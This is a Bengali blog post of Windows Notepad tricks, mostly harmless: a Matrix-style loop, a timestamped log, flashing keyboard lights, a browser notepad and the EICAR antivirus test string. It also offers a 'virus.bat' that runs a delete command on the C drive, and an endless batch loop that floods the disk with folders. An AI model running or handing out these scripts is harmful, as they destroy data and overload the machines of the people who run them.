রবিবার, ২৬ জানুয়ারী, ২০১৪

নোটাপ্যাড এর মজার কিছু টিপস জেনে নিন !

আমি আপনাদের জন্য নোট প্যাড এর কিছু মজার টিপস নিয়ে এলাম আশাকরি আপনাদের ভালো লাগবে এবং আপনারা মজাও পাবেন । মোট ৭ টি টিপস দেবো সব কটি আলাদা আলাদা ভাবে বিস্তারিত দেবো নীচে থেকে দেখে নিন কোন সমস্যা হবে না ।



1. Matrix ইফেক্ট Matrix মুভিটি আমারা কম বেশি সবাই দেখেছি চলুন দেখে নিই কীভাবে নোট প্যাড এর দ্বারা কাজটি মাত্র এ ক্লিকে করবেন ।  


lpkj

১// আপনার নোট প্যাড ওপেন করুণ এবার নীচের কোড গুলোকে নোট প্যাডে টাইপ করুন ।
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
২// এবার এটাকে Matrix.bat নামে সেভ করুন ।

2. C ড্রাইভ ডিলিট করার জন্য একটি ভাইরাস তৈরি করুন । 



১// আপনার নোট প্যাড ওপেন করুন এবার নীচের কোডটি নোট প্যাডে কপি পেস্ট করুণ ।
@Echo off
Del C:\ *.* |y
২// এবার এটাকে virus.bat নামে সেভ করুণ । এবার সেটিতে ক্লিক করলেই আপনার C ড্রাইভ ডিলিট হয়ে ্যাবে । তাই এটা নিজে ব্যাবহার করবেন না । শুধু মাত্র জানার জন্য শেয়ার কোরা ।

3.  নোট প্যাড ব্যাবহার করে Personal Diary তৈরি করুন যেখানে সময় ও তারিখ দেখাবে । 


Screenshot_5
১// আপনার নোট প্যাড ওপেন করুন এবার নীচের কোডটি নোট প্যাডে কপি পেস্ট করুণ ।
.LOG
২// এবার এটাকে যেকোনো নাম দিয়ে Save করে নিন । এবার এটাকে বন্ধ করে আবার ওপেন করুন দেখুন সময় ও তারিখ দেখা যাবে ।

4. আপনার কী বোর্ডকে Dance করান । 



১// এই টিপস টি এরা আগে মনে হয় অনেক বার হয়েছে তবুও করলাম ওনেক নতুন বন্ধুরা নাও জানতে পারে । প্রথমে আপনার নোটপ্যাড ওপেন করুন । তারপর নীচের কোডটি নোটপ্যাডে কপি পেস্ট করুন ।
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
২// এবার এটাকে dance.vbs নামে সেভ করে দিন । তারপর নোটপ্যাড বন্ধ করে সেভ করা ফাইল টিতে দুবার ক্লিক করে আপনার মউস এর দিকে লক্ষ করুন দেখুন ক্যামন লাগে ।

5. আপনার Web Browser কে নোটপ্যাড হিসাবে ব্যাবহার করুন । 



১// কাজটি করার জন্য আপনি Browser  ওপেন করুণ তারপর নিচের কোডটি এড্রেস বারে Search করুন ।
data:text/html, <html contenteditable>
২// এবার দেখুন আপনি সেখানে নোটপ্যাড এর মতো লিখতে পারছেন । এখান থেকে সেভ করার জন্য কীবোর্ড থেকে Ctrl + S করুণ সেভ হয়ে যাবে ।

6. আপনার Anti-virus কাজ করছে কিনা পরীক্ষা করে নিন । 




১// আপনার নোটপ্যাড ওপেন করুন এবার নীচের কোডটি নোটপ্যাডে কপি পেস্ট করুন ।

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTI-VIRUS-TEST-FILE!$H+H*

২// এবার সেটাকে  anti-virus.exe নামে সেভ করুন ।

৩// যদি এই ফাইল টিকে ডিলিট করে দেয় তাহলে বুজবেন আপনার Anti-virus ঠিক ভাবে কাজ করছে আর না করলে বুজতেই পারছেন ।

7. এ ক্লিকে ১০০০ folders তৈরি করুন । 

 

১// আপনার নোটপ্যাড ওপেন করুন এবার নীচের কোডটি নোটপ্যাডে কপি পেস্ট করুন ।
@echo off
:top
md %random%
goto top

২// এটাকে 1000.bat নামে সেভ করুন কয়েক সেকেন্ড অপেক্ষা করুণ তারপর মজা দেখুন ।

নোট  ঃ এটা নিজে ট্রাই না করাই ভালো আর যদি করেন ডেস্ক টপে করবেন না । অন্য কোন folder এ করে দেখতে পারেন ।

এই টিপস গুলো জনেনা তাদের জন্য আমার এই পোস্ট ।

ভাল থাকবেন সুস্থ থাকবেন । আল্লাহ্‌ হাফেজ ।

কোন মন্তব্য নেই:

একটি মন্তব্য পোস্ট করুন